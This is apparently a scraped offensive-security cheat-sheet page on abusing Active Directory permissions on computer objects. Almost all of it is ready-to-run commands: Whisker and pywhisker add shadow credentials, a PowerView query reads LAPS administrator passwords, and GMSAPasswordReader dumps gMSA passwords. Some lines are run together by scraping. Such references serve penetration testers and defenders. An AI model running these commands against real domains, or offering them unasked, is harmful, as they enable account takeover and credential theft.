Computer
DACL Attacks on a Computer
1) WriteProperty
Shadow Credentials
Whisker.exe add /target:<target> /domain:domain.local /dc:dc.domain.local /path:C:\path\to\file.pfx /password:Password123!Linux
pywhisker.py -t computer$ -a add -u user1 -p password -d domain.local -dc-ip <DC_IP> --filename user2Kerberos RBCD
2) AllExtendedRights
ReadLAPSPassword
Get-DomainComputer <target>.domain.local -Properties ms-mcs-AdmPwd,displayname,ms-mcs-AdmPwdExpirationTimeReadGMSAPassword
./GMSAPasswordReader.exe --accountname gmsaAccountLinux
Last updated